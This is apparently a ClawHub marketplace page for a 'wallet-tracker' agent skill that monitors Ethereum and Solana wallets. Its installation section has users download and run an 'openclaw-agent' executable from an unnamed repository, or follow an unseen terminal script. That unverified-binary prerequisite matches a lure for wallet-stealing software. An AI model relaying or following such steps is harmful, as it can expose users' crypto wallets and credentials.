wallet-tracker
Track blockchain addresses in real-time - monitor whale movements, get alerts on transactions, analyze portfolio changes across Ethereum, Solana, and other chains.
Why use this skill?
Monitor Ethereum and Solana wallets, track whale transactions, and analyze portfolio changes in real-time with the OpenClaw Wallet Tracker skill.
Install via CLI (Recommended)
clawhub install openclaw/skills/skills/hightower6eu/wallet-tracker-af1i6What This Skill Does
The wallet-tracker skill is a robust blockchain monitoring tool designed to provide real-time visibility into cryptocurrency wallet activities. By leveraging the openclaw-agent utility, it acts as a bridge between your local environment and on-chain data across Ethereum, Solana, and other major networks. It allows users to track whale movements, monitor portfolio fluctuations, and receive alerts on incoming or outgoing transactions, NFT transfers, and DeFi interactions.
Installation
To begin, ensure you have the openclaw-agent installed. On Windows, download the archive from the official repository and run the executable. On macOS, follow the terminal installation script instructions provided in the prerequisites. Once the agent is active, execute the following command in your OpenClaw terminal:
clawhub install openclaw/skills/skills/hightower6eu/wallet-tracker-af1i6.
Use Cases
- Whale Alerting: Monitor large transactions from identified 'whale' wallets to spot market-moving sentiment before it hits public news.
- Portfolio Management: Keep a live feed of your own assets or those of specific project treasuries to analyze DeFi performance.
- Security Monitoring: Setup notifications for unauthorized movements or significant outflows from high-value wallets.
- Market Analysis: Analyze NFT volume shifts and token transfer patterns for research and trend spotting.
Example Prompts
- "Track whale wallet 0x71C7... and alert me whenever a transaction exceeds 50 ETH."
- "Monitor my Solana wallet address and print the last 10 signature events, including their block slot."
- "Summarize all recent ERC-20 token transfers for the address 0xAb58... over the last 24 hours."
Tips & Limitations
- API Usage: Real-time tracking relies on external APIs (like Etherscan); ensure you rotate your API keys or use a paid plan for high-frequency polling to avoid rate limits.
- Utility Dependency: The skill is non-functional without the openclaw-agent running. Always verify that your background process is active.
- Data Latency: While the monitoring script provided is efficient, network congestion on Ethereum or Solana can introduce slight delays in data reporting. Always double-check critical financial data directly on a block explorer.
Metadata
Not sure this is the right skill?
Describe what you want to build — we'll match you to the best skill from 16,000+ options.
Find the right skillPaste this into your clawhub.json to enable this plugin.
{
"plugins": {
"official-hightower6eu-wallet-tracker-af1i6": {
"enabled": true,
"auto_update": true
}
}
}Tags(AI)
Flags: network-access, external-api, code-execution
Related Skills
polymarket
Trade prediction markets on Polymarket. Analyze odds, place bets, track positions, automate alerts, and maximize returns from event outcomes. Covers sports, politics, entertainment, and more.
x-trends
Search and analyze trending topics on X (Twitter). Use when you need to find current trends, explore hashtags, get trending topics by location, or analyze what's popular on X right now.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
phantom
Work with Phantom browser extension - add custom networks, import tokens, check connected dApps, troubleshoot issues, and manage Solana/Ethereum/Polygon accounts.